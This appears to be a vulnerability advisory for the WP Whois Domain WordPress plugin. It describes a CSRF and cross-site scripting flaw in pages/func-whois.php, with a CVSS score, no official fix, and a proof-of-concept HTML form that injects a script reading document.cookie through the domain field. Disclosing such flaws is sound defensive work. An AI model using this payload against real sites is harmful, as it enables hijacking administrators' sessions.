Homepage
https://wordpress.org/plugins/wp-whois-domain/
OverviewDue to a lack of CSRF mitigation and entity encoding in pages/func-whois.php , it is possible to execute scripts in the context of an admin user by including a script in the domain field, via the query string or a POST field.
CVSS Score5.5
CVSS Vector(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:U/RC:C)
Versions AffectedAll versions
SolutionThere is currently no official fix, the plugin has been removed from the WordPress plugin repository until the vendor provides a solution.
Proof of Concept <form action="[url of page with the whois form]" method="post"> <input type="hidden" name="domain" value=""><script>alert(document.cookie)</script>"> <input type="submit" value="Submit"> </form> WPVDB-ID8683